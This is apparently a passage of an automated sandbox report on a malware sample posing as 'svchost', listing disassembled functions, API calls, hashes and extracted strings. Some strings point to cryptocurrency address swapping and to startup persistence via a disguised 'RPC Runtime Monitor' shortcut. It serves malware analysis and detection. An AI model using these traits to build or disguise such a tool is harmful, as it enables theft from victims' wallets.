                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      Function 00406940 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      Function 004018D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      Function 00410413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      Function 00415C24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      Function 0040D490 Relevance: 9.2, APIs: 6, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,81C72413,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      Function 00415ED1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      Function 0040FB96 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(02402188), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      Function 0040D6D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      Function 0041627E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      Function 0040E340 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _wcschr$CreateDirectoryErrorLast_memset
                                      • String ID:
                                      • API String ID: 772003639-0
                                      • Opcode ID: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction ID: 2d672686d953e9741263a9bf21e8db2c6a89ede790307b3869fa385045096eae
                                      • Opcode Fuzzy Hash: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction Fuzzy Hash: B24173B0900218DBDB24CF65CC85BE97B74AB44300F0089FAE709772C1D6799A9A8F6D
                                      Function 00413BC9 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID:
                                      • API String ID: 1020059152-0
                                      • Opcode ID: 58750f50900bc6b8eccf237a22aa7467fc111bf939f9debebe0a7c729932f5c0
                                      • Instruction ID: 47fafc7281d56cd7232f0f11f7b3e10cd24c1ba3464f88fcbebd715b16cd05de
                                      • Opcode Fuzzy Hash: 58750f50900bc6b8eccf237a22aa7467fc111bf939f9debebe0a7c729932f5c0
                                      • Instruction Fuzzy Hash: 11112733504211ABCB312FB5AC066DB3B989F453A5B20442BF948A6251EEBCDDC1879D
                                      Function 00410317 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction ID: e4933e4f9cff87b6db1e50e91856c3ef302a7f33dd3041806c411e2e618183a8
                                      • Opcode Fuzzy Hash: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction Fuzzy Hash: D7F0F631940214ABD720FB6699037CE33906F04728F14010FF818E72D2DBFC48C19A5D
                                      Function 00404510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      • Opcode ID: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction ID: 9fc85db481ca541f5af55655987844c855698c76e688db874c41ef445bc3599c
                                      • Opcode Fuzzy Hash: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction Fuzzy Hash: 244176B4A00209EFCB08CF98D5909DEB7F2BF89300F208599E9156B395D735AE41DF99
                                      Function 004077B0 Relevance: 6.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      • Opcode ID: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction ID: a62dec62c92b60b4c519499498a98483a560beb34225c0dd4930cde99cd07262
                                      • Opcode Fuzzy Hash: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction Fuzzy Hash: 7B61B3B5E04208EBDF04DFE4C851BEEBBB1AF88304F148069E9057B381D738AA45DB95
                                      Function 0041527E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: 5b5670c111a8cead40a1ffb16e00d74f18a4a9ed4f14907d396a6f9763220556
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 7E117E3200054EFBCF125E85DC418EE3F22BB89354B598456FE2859131D33AC9B2AB85
                                      Function 004097F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
